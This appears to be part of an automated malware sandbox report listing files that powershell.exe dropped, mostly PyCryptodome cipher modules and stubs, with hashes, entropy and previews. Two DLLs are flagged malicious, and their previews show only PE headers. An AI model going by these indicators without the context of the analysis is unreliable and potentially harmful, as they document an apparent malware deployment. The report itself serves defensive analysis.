                                                                                                                                                                                                                      Entropy (8bit):4.866819320475539
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dOFQHvotgiNiCuyG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gB7C5K0kmIct4NZRYotK0
                                                                                                                                                                                                                      MD5:2B3DBAEE6FAB3A0C0D01BBFE16607C40
                                                                                                                                                                                                                      SHA1:E218D06E4B9FBC41AA56BCFE73226C9ABC108343
                                                                                                                                                                                                                      SHA-256:41AEF064734CF279388BCD875F0252D27FDFB3565904B7FA1935F63C82F7EF47
                                                                                                                                                                                                                      SHA-512:A7DDC5E29DCBEC23229F199E97B1D6D65CAB1F17ADD25C5F1823BBD98E7917C524B714C2793934024913154B38ACBF42B9B64638579ADA0B2CF1207B20BDF4AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1029
                                                                                                                                                                                                                      Entropy (8bit):4.895477988326694
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJiiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHYBy:K+1AgGWG6N7XY6JqJejbFoeR4w
                                                                                                                                                                                                                      MD5:F8300805D96A9983E023F2F7860C6E72
                                                                                                                                                                                                                      SHA1:C80FDD36709906927D8355E2E937AB89E40A8C7C
                                                                                                                                                                                                                      SHA-256:BFBAF8AEC79DFC45CB8C26053797A43735A7AACA50AA5504FE080E900A6A38E6
                                                                                                                                                                                                                      SHA-512:32F47B45D4221E66CE58C49C2564C3DF40416C772C2958C1E374719DE3884945D48128704A18686A5491665B61817E592DC8626592F44064FEFCB649F0F10C71
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......blo
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7128
                                                                                                                                                                                                                      Entropy (8bit):4.870004969011185
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:dKQHvCgXhz1GPoiRxwKIUK9t4A1zRYotKa:YeCg1AhRn9K9t42NYotKa
                                                                                                                                                                                                                      MD5:89BE0C40C2479D438C4F3965925EAE7F
                                                                                                                                                                                                                      SHA1:8DED4935F0EA56AAEC5E45509E47260E8A193219
                                                                                                                                                                                                                      SHA-256:C35476642D7B26E9C71CF16F6FB0E4C44F9CC643A3BF11F1990E38AC07332EED
                                                                                                                                                                                                                      SHA-512:D36C095C83FB61AA18C33D0F5699B464212955C776DA1A01FE400B50642B0420E4A0B7E04ECC50BA505F64B1307BB9CA6AEE3FB85ECA8AF80825F3A7358C4380
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1101
                                                                                                                                                                                                                      Entropy (8bit):4.968068738679689
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RENbKAI1QJSzJSVJuJSpJQlJSNINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1AgGWG6SGxOkDRJqJejbFoeR4X
                                                                                                                                                                                                                      MD5:DC89ACAAEBEA0CE851FB522E37EF0ACE
                                                                                                                                                                                                                      SHA1:0C497C6CD79E70AB8CAB26CE18727FAD20750A59
                                                                                                                                                                                                                      SHA-256:3B868D2E9A2B41C27FCAC90E4C0DBAE1634F7198720805FF9F450C4C4D7CB57F
                                                                                                                                                                                                                      SHA-512:99F7DBC1CACB3226D916CD744F9FA64787027DBEB39C500788663559D4DDFA985AD8BCF752ED7FC4F65C0499439E867AF9C9F156729D4E671BE4C32A8D036E70
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode,
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8839
                                                                                                                                                                                                                      Entropy (8bit):4.800912681448876
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dEFQHvo7uinR7s8L34mb8qko9uNFI3y5xU3a5tLKZCMKesDBDFBIMd3T23jqk9ku:d6QHvg3oFA/Iywx9X96F9ku
                                                                                                                                                                                                                      MD5:A71E59688CDC364EAA1F69F7156DC580
                                                                                                                                                                                                                      SHA1:180CE4D87F5878F947D0FCAF4AAB1B25A46E0A00
                                                                                                                                                                                                                      SHA-256:D4B4FEAE34B0CAB1793ED566D1D578BA0998C7EC78E03150E72E911D5AAD4200
                                                                                                                                                                                                                      SHA-512:A17178066CC0B1E291D302AADA51ADD5F432896EA45B787408E5FF08906CC9CBDA39899F7CC594DC33B76AEDB207380CA440F06DCF436B3EF72B0415262D537E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1218
                                                                                                                                                                                                                      Entropy (8bit):4.825103390769477
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1REjQFC19js1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFyw1IttDLteMI5aoJupVjHo
                                                                                                                                                                                                                      MD5:D684C8F5065F2BE30D78895F52B3D3DE
                                                                                                                                                                                                                      SHA1:9121E5BF5C9B1D9A4BA6BC83690DAB4181BB784A
                                                                                                                                                                                                                      SHA-256:6A2570614ACE35D86E25EAB9F2AAAFD351B6B7FF85A9893556FB1A47524E099F
                                                                                                                                                                                                                      SHA-512:ADF2D2B86EA419A696CFA5C30E274B9B116B7ED8577C64D91C31BEF21EBA8C30F8041ACE0BD134E43F5FC13E152D34554F741809A67A392631C894006685086B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlg
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7232
                                                                                                                                                                                                                      Entropy (8bit):4.877377050556551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dtFQHvov1sAi70A3ZutH8MKD8LzmodYavD+U8FbPNapwDQtCa:drQHv942ME8H/d8RNuwBa
                                                                                                                                                                                                                      MD5:9E3C6EAF6F389D85049E756F8492DFA1
                                                                                                                                                                                                                      SHA1:0CC1E1B25396DD1504B154C924CA184600D26F28
                                                                                                                                                                                                                      SHA-256:28D6DBD60684F210A8CF662A7AC66BCB978E308B7E2F24F9B579C664C70DF960
                                                                                                                                                                                                                      SHA-512:E16862D9F623C40377F149A49061D50C56EAC58D29831288E1DF378D5B60839F92F33832646F3134A237F5B75280C9FE971555F39C7B642D433ED35295CFF5A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):710
                                                                                                                                                                                                                      Entropy (8bit):4.7893819013663546
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYB1mmNkUgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEjJ:1REq7jspT3ENIAlUH8Myje+wqKozuMEt
                                                                                                                                                                                                                      MD5:EFF76A3F67661BDE6D9D50BA8E67540F
                                                                                                                                                                                                                      SHA1:989514DFB3236DC0D122B27B0430619967FEEBBA
                                                                                                                                                                                                                      SHA-256:49DCC3570B0637BF76AFF4BB389AF7E1388AAD93CBFFBF9A1FEB7A3C12186ADF
                                                                                                                                                                                                                      SHA-512:7C0D68FC3DEEA336C891632927C4E69EFF397EB4F2449642E8152C3B6B2AF0D077DE023234E3B31D1667AB35460361C79263A4C38C43EC647E188538D38CECBF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Cryptodome.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6536
                                                                                                                                                                                                                      Entropy (8bit):4.629114332913442
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:GFQHvo7i49IR+5Jox+lgRXv8NBgQ9Qb3B0NpLPpnwtV8:UQHvcKDRXUNBgHGjRwtV8
                                                                                                                                                                                                                      MD5:D91E11F6F88A1E5209F4946F9CEDF0A2
                                                                                                                                                                                                                      SHA1:14E8A384D7BAEB7691C33669429FCAB096043367
                                                                                                                                                                                                                      SHA-256:27402B67081E01512474926A3F1153C6FCA1AE528038CF7E645C179BCA5FCA1D
                                                                                                                                                                                                                      SHA-512:F2D1EE2AE9170742C2841A0D94F82286F113106703C9BD0C517BF6102E13DC42C3FE1C4542B865130ACAA6961AFEFBC9DD4586DB4362275633A2D72A185C7660
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):770
                                                                                                                                                                                                                      Entropy (8bit):4.753367031924495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                                                                                                      MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                                                                                                      SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                                                                                                      SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                                                                                                      SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                                                      Entropy (8bit):4.704418348721006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:nDzsc9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDj90OcX6gY/7ECFV:Dzs69damqTrpYTst0E5DjPcqgY/79X
                                                                                                                                                                                                                      MD5:85F144F57905F68ECBF14552BAB2F070
                                                                                                                                                                                                                      SHA1:83A20193E6229EA09DCCAE8890A74DBDD0A76373
                                                                                                                                                                                                                      SHA-256:28696C8881D9C9272DE4E54ABE6760CD4C6CB22AD7E3FEABAF6FF313EC9A9EAF
                                                                                                                                                                                                                      SHA-512:533EB4073594BFE97850DFF7353439BACD4E19539E247EE00D599F3468E162D2D88C5CA32322772538A73706DF9A6DD14553B35F47C686D2E20D915FAB766BDA
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...O..e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5348
                                                                                                                                                                                                                      Entropy (8bit):4.837696102147451
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MHDqrYJALrYJHdt3EHGuITiNy6av1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITESVNi1bk3ITm6tXRY9
                                                                                                                                                                                                                      MD5:2801DEB252C32BF76F025CDE403A1AF9
                                                                                                                                                                                                                      SHA1:0D2145F2D4CC458056C5ADCB8275C3DA36C64CB8
                                                                                                                                                                                                                      SHA-256:87D7CB3A47E3234519A1E01A2B0D007319264E2CB94E54A8864A22FD00165A36
                                                                                                                                                                                                                      SHA-512:675BA440D7C4C03B3B388AD7F350949321F7C50289DF3DAA6DD0D763DD269304ED22448989AAA7197D59A59221283861FE3284C6DA0256759313C346CC7A3A47
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                      Entropy (8bit):4.915960101562323
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYBNHKkHb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQkHzlbgHvIY3YyogmvNZRy/O
                                                                                                                                                                                                                      MD5:0417C72442B8EC2EF4EF4C6A768824D2
                                                                                                                                                                                                                      SHA1:64400FA2D484328EAA347A10CF101504D7552CAB
                                                                                                                                                                                                                      SHA-256:F2130E49C75B0660FCFD28D505BEF95FA392CBC2EF636717F49F855546440706
                                                                                                                                                                                                                      SHA-512:65B16EB4AADB97C2B6EB52E6DB997AFAAFB4BC16B99DED9BC6956D30BD4373B0EDE496E2C97D63D5DCA6FA53261B446B179D33EED7C2F0AA5D94BC5FE13F2654
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Iterable....from Cryptodome.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                      Entropy (8bit):4.968532257508093
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:JF3rugNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDq4wYH/kcX6G:tF/1nb2mhQtkXHTeZ87VDqyMcqgYvEp
                                                                                                                                                                                                                      MD5:14A20ED2868F5B3D7DCFEF9363CB1F32
                                                                                                                                                                                                                      SHA1:C1F2EF94439F42AA39DCDE1075DEFAC8A6029DC6
                                                                                                                                                                                                                      SHA-256:A072631CD1757D5147B5E403D6A96EF94217568D1DC1AE5C67A1892FBF61409E
                                                                                                                                                                                                                      SHA-512:33BE8B3733380C3ADFE5D2844819C754FB11FCBC7AA75DA8FBB4D6CEF938E7D3267FBD215B9666DCFA5795D54484360A61DAF193BC75B57C252D44E5F9F0D855
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...P..e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2967
                                                                                                                                                                                                                      Entropy (8bit):4.697371690730744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:AF/1FvgfQq1B5GIDvOQllrRJcC9FVJ79oUZzHfJUPdD9Bd+uTV/H+:m1FvWQq1jGIDvOQllrRJcC9FVJ79XBHZ
                                                                                                                                                                                                                      MD5:31C5DE18019727C2DBB04F0A9D2B6CAF
                                                                                                                                                                                                                      SHA1:D7EFD7E56BDD5CEDBBF1B1259726FC13A214E630
                                                                                                                                                                                                                      SHA-256:C33FF384C31CC8A6D095F1708BB2090B38563B3EE0A127A546ACE5815A104AEC
                                                                                                                                                                                                                      SHA-512:0E28065B3E0727739532FD0D9A7752F76EAFA1AC4AF8146A9145320F333C57DDC8A89EAD94458BEF48809F047615C281C058FFA19BF0CD5239F14DC124D1A873
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# A block cipher is instantiated as a combination of:..# 1. A base cipher (such as AES)..# 2. A mode of operation (such as CBC)..#..# Both items are implemented as C modules...#..# The API of #1 is (replace "AES" with the name of the actual cipher):..# - AES_start_operaion(key) --> base_cipher_state..# - AES_encrypt(base_cipher_state, in, out, length)..# - AES_decrypt(base_cipher_state, in, out, length)..# - AES_stop_operation(base_cipher_state)..#..# Where base_cipher_state is AES_State, a struct with BlockBase (set of..# pointers to encrypt/decrypt/stop) followed by cipher-specific data...#..# The API of #2 is (replace "CBC" with the name of the actual mode):..# - CBC_start_operation(base_cipher_state) --> mode_state..# - CBC_encrypt(mode_state, in, out, length)..# - CBC_decrypt(mode_state, in, out, length)..# - CBC_stop_operation(mode_state)..#..# where mode_state is a a pointer to base_cipher_state plus mode-specific data.....import os....from Cryptodome.Cipher._mode_ecb import
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8235
                                                                                                                                                                                                                      Entropy (8bit):5.504247600512268
                                                                                                                                                                                                                      Encrypted:false
